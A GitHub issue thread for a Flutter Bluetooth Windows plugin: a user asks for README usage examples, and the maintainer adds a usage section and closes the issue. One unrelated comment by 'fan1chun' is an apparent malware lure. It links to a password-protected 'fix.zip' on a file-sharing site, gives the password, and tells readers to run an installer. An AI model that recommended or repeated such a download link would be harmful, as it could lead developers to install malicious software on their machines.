### ISSUE TITLE
docs: show example Windows usage in the readme

### ISSUE THREAD

**Issue by chipweinberger** [chan150/flutter_blue_plus_windows#7]
It's not immediately clear you you use this, versus the normal FBP.

I think a "usage" section would be helpful.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chan150** [comment]
Closed this issue due to adding "usage" 
@chipweinberger

**Comment by chipweinberger** [comment]
thanks man!
